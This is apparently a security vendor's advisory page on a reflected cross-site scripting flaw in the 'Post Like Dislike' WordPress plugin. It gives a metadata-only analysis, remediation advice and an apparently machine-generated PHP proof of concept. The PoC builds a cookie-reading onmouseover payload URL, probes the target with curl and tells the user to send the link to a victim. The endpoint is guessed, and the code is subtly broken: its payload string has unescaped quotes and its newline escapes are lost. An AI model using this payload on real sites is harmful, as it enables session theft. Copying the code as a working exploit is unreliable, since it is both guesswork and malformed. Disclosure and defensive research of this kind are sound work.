Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14130: Post Like Dislike <= 1.0 – Reflected Cross-Site Scripting via $_SERVER['PHP_SELF'] (post-like-dislike)

CVE ID CVE-2025-14130
Plugin post-like-dislike
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.0
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14130 (metadata-based):
The Post Like Dislike WordPress plugin version 1.0 contains a reflected cross-site scripting vulnerability. This vulnerability exists in all plugin versions up to and including 1.0. The vulnerability allows unauthenticated attackers to inject malicious scripts via the PHP_SELF server variable. The CVSS 3.1 score of 6.1 indicates medium severity with impacts on confidentiality and integrity.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping of the $_SERVER[‘PHP_SELF’] variable. The plugin likely echoes this variable directly into HTML output without proper escaping. This inference comes from the CWE-79 classification and the vulnerability description. Without access to source code, Atomic Edge cannot confirm the exact vulnerable file or line numbers. The vulnerability description explicitly identifies PHP_SELF as the attack vector.

Exploitation requires an attacker to craft a malicious URL containing JavaScript payloads in the PHP_SELF parameter. The attacker must trick a victim into clicking the link or visiting the malicious page. The payload executes in the victim’s browser context when the vulnerable plugin page loads. The exact endpoint is not specified in the metadata, but WordPress plugins commonly use admin pages accessible via /wp-admin/admin.php?page=post-like-dislike or similar plugin-specific admin interfaces.

Remediation requires proper output escaping of the PHP_SELF variable before echoing it to HTML. WordPress provides esc_url() or esc_attr() functions for this purpose. The plugin should implement these functions on all instances where PHP_SELF appears in output. Input validation is not applicable here since PHP_SELF is a server variable controlled by the request URI.

Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser. Attackers can steal session cookies, perform actions as the authenticated user, or redirect users to malicious sites. The vulnerability requires user interaction, limiting its impact compared to stored XSS. The scope change (S:C in CVSS) indicates the vulnerability can affect other browser security contexts beyond the immediate page.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14130 - Post Like Dislike <= 1.0 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']
<?php
/**
 * Proof of Concept for CVE-2025-14130
 * This script demonstrates reflected XSS via PHP_SELF in Post Like Dislike plugin.
 * Since exact vulnerable endpoint is unknown, this PoC targets common WordPress admin patterns.
 * Assumptions:
 * 1. Plugin has an admin page accessible via /wp-admin/admin.php?page=post-like-dislike
 * 2. The PHP_SELF variable is echoed without escaping on this page
 * 3. The vulnerability affects unauthenticated users (PR:N in CVSS)
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';

// XSS payload that triggers an alert and demonstrates cookie theft potential
$payload = '/wp-admin/admin.php/'" onmouseover=alert(document.cookie) style='display:block;width:100%;height:100%;position:fixed;top:0;left:0;z-index:999999;' "';

// Construct malicious URL with payload in path component (affects PHP_SELF)
$attack_url = $target_url . '?page=post-like-dislike' . $payload;

// Display the attack URL
echo "Atomic Edge CVE-2025-14130 Proof of Conceptn";
echo "============================================n";
echo "Target: " . $target_url . "n";
echo "Attack URL: " . $attack_url . "nn";

// Optional: Test if the endpoint exists (without triggering XSS)
echo "Testing endpoint availability...n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '?page=post-like-dislike');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "Endpoint appears accessible (HTTP 200).n";
    echo "Send the Attack URL to a victim user. When visited, the XSS payload will execute.n";
} else {
    echo "Endpoint returned HTTP $http_code. The plugin admin page may not be at this location.n";
    echo "Try alternative paths like /wp-admin/options-general.php?page=post-like-disliken";
}

// Note: This PoC does not automatically exploit the vulnerability
// It only generates the attack URL for demonstration purposes
echo "nNote: Actual exploitation requires user interaction (UI:R in CVSS).n";
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School